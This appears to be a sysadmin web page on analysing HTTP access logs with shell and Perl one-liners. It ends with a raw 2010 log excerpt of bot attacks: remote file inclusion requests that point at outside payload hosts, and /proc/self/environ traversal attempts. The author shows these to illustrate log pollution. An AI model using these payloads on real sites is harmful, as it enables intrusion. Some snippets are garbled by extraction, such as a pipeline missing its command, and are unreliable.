|
Home | Switchboard | Unix Administration | Red Hat | TCP/IP Networks | Neoliberalism | Toxic Managers |
(slightly skeptical) Educational society promoting "Back to basics" movement against IT overcomplexity and bastardization of classic Unix |
|
Perl was the language designed for processing texts was it shines in this particular task. No other scripting language generally comes close.
|
Simple analysis of http server logs can be done using just Perl (or other scripting language) and pipes. Very useful reports can be generated this way. But the problem here is that Web server logs are now polluted and it is not easy to distinguish legitimate requests that failed with code 404 (page not found) and bogus request from the army of zombies accessing the website day and night. See Requests for non-existing web pages. That makes traditional log analyzers like AWstats much less useful. The only information in 404 section of AWstats that is fed with raw logs is information about the level of activities of zombies, not so much about pages or images that might be missing. So before you apply AWstats to your logs they need to be pre-filtered with custom Perl script. This is impossible to do in case you are using Cheap Web hosting provider so the problem is real and painful.
The same is true for successful hits. I have many cases when a particular page suddenly goes to the top ten in popularity and then discover that it is due to some script that is retrieving it in a loop. Sometime not the whole page but just the header.
Generally approximately 6% of total IP space are malignant users. For example, if the total size of IP address space is 100K addresses then approximately 6K of them are malignant users and robots. It is clear that it is impossible to block them using simple methods. But you can and should deny access to the top abusers, let's say to a dozen addresses in each malignant access category. Of course those IP sets overlap, as many robots are engaged in several types of malignant activities.
Generally for more or less popular web site malignant robots distort web statistic so significantly that without filtering them judgment about which pages of your site are popular (to say nothing about more complex question) is suspect. Usually those pages that you assume popular without filtering are result of activities of Referer Spammers or Bangers. I saw cases when a page was accessed tens thousand of time a day and all accesses were "fake" -- supposedly coming from some undebugged robot, or as target of some "is alive" type of script.
Most web servers store their access log in what is called the "common log format." Each time a user requests a file from the server, a line containing the following fields is added to the end of the log file:
10.1.1.1
). Very rarely this is
the a resolved DNS name of the remote server requesting the page. For performance reasons, most
web servers are configured not to do hostname lookups on the remote host. This means that all you
end up with in the log file is a bunch of IP addresses. But it's not difficult to convert them into
DNS names if necessary for "interesting" subsets of long when you start analyzing them. -
). -
). "GET / HTTP/1.0"
. The GET
part means
it is a GET request (as opposed to a POST or a HEAD request). The next part is the path of the URL
requested; in this case, the default page in the server's top-level directory, as indicated by a
single slash (/
). The last part of the request is the protocol being used, at the time
of this writing typically HTTP/1.0 or HTTP/1.1. 200
means everything was handled okay,
304
means the document has not changed since the client last requested it, 404
means the document could not be found, and 500
indicates that there was some sort of
server-side error. (RFC 1945 contains more. See
http://www.w3.org/Protocols/rfc1945/rfc1945.)
An extended version of this log format, often referred to as the "combined" format, includes two additional fields at the end:
Here is a very simple example of finding the most visited sites using pipes:
gzip -dc $1.gz | grep '" 200' | cut -d '"' -f 2 | cut -d '/' -f 3 | \ '[:upper:]' '[:lower:]' | sort | uniq -c | sort -r > most_frequent
Note: Most tips were borrowed from ktmatu - One-liners by Matti Tukiainen. Some are modified. We assume that the web server log files (access_log*) are in Combined Format.
Less has option -S or --chop-long-lines Causes lines longer than the screen width to be chopped rather than folded. That is, the portion of a long line that does not fit in the screen width is not shown. The default is to fold long lines; that is, display the remainder on the next line.
less -S access_log
grep 200 access_log | wc -l
gzip -dc access_log.gz | egrep -vc '(\.gif |\.jpg |\.png )' 2569
grep -c `date '+%d/%b/%Y'` access_log 2569
grep `date '+%d/%b/%Y'` access_log | cut -d" " -f1 | sort -u | wc -l 1196
grep -c 01/Jan/2001 access_log 2569
gzip -dc access_log.gz | grep -c 01/Jan/2001 2569
head -1 access_log; tail -1 access_log foo.example - - [30/Dec/2000:23:55:25 +0200] "GET /~ktmatu/ ... bar.example - - [06/Jan/2001:23:53:37 +0200] "GET /~ktmatu/rates.html ...
gzip -dc access_log.gz | head -1 ; gzip -dc access_log.gz | tail -1 foo.example - - [30/Dec/2000:23:55:25 +0200] "GET /~ktmatu/ ... bar.example - - [06/Jan/2001:23:53:37 +0200] "GET /~ktmatu/rates.html ...
cut -d" " -f4 access_log | cut -d"/" -f1 | uniq [30 [31 [01 [03 [04 [05 [06
gzip -dc wlog0101.gz | cut -d" " -f4 | cut -d"/" -f1 | uniq [30 [31 [01 [03 [04 [05 [06
This is just a very quick and dirty way to check the log.
perl -ane 'print $_ if (scalar (split /\"/)) != 7' access_log | wc -l 7
gzip -dc access_log.gz | perl -ane 'print $_ if (scalar (split /\"/)) != 7' | wc -l 7
grep -n '.*' access_log | grep '^15927\:' 15927:foo.example.com - - [20/Jan/2002:11:23:45 +0200] "GET ...
grep -n '.*' access_log | grep '^1592.\:' 15920:foo.example.com - - [20/Jan/2002:11:23:40 +0200] "GET ... 15921:foo.example.com - - [20/Jan/2002:11:23:41 +0200] "GET ... 15922:foo.example.com - - [20/Jan/2002:11:23:41 +0200] "GET ... ...
gzip -dc access_log.gz | grep -n '.*' | grep '^15927\:' 15927:foo.example.com - - [20/Jan/2002:11:23:45 +0200] "GET ...
gzip -dc access_log.gz | grep -n '.*' | grep '^1592.\:' 15920:foo.example.com - - [20/Jan/2002:11:23:40 +0200] "GET ... 15921:foo.example.com - - [20/Jan/2002:11:23:41 +0200] "GET ... 15922:foo.example.com - - [20/Jan/2002:11:23:41 +0200] "GET ... ...
grep `date '+%d/%b/%Y'` access_log | awk '{ s += $10 } END {print s}' 13113756
grep `date '+../%b/%Y'` access_log | awk '{ s += $10 } END {print s}' 569477018
grep googlebot access_log | awk '{ s += $10 } END {print s}' 29832233
grep ^169.254.22.12 access_log | awk '{ s += $10 } END {print s}' 46760880
Partial content requests are usually generated by download managers to speed the downloading of big files and Adobe Acrobat Reader to fetch PDF documents page by page. In this example 206 requests generated by Acrobat reader are deleted so that they don't inflate the hit count.
grep -v '\.pdf .* 206 ' access_log > new_log
grep ' \[../May/2009\:' access_log | gzip -9c > access_log-2009-05.gz
grep ' \[../May/2009\:' access_log | bzip2 > access_log-2009-05.bz2
tail -f access_log
less access_log
Recently the number of "strange" access record in web logs jumped up and it became interesting to analyze the logs and see what those "strange" users are doing. Here is one fragment that I have found in 2010:
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /Admin/Tivoli/TMF/Gateways/gateway_troubleshooting.shtml%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 67.223.224.130 - - [16/Aug/2010:07:14:51 -0600] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt?? HTTP/1.1" 302 824 "-" "libwww-perl/5.831" 67.223.224.130 - - [16/Aug/2010:07:14:52 -0600] "GET /400.shtml?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:37 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 89.111.176.226 - - [16/Aug/2010:07:43:47 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:50 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 125.164.72.146 - - [16/Aug/2010:07:48:59 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:00 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:01 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:08 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:09 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:10 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:19 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:20 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:21 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:40 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:41 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:42 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:43 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:44 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:45 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 91.121.1.124 - - [16/Aug/2010:07:52:17 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 62.193.242.164 - - [16/Aug/2010:08:03:41 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813" 62.193.242.164 - - [16/Aug/2010:08:03:43 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813" 209.190.190.5 - - [16/Aug/2010:08:08:36 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14FM SSL-MM/1.4.1 OpenSSL/0.9.7d-dev" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/index.shtml/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /Scripting/php.shtml/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /Scripting/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:07 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 109.86.145.204 - - [16/Aug/2010:09:48:06 -0600] "GET /Malware/Malicious_web/Bulletin/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /Malware/Malicious_web/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 74.8.102.118 - - [16/Aug/2010:10:10:24 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.7dev.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/oss_for_solaris.shtml/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET 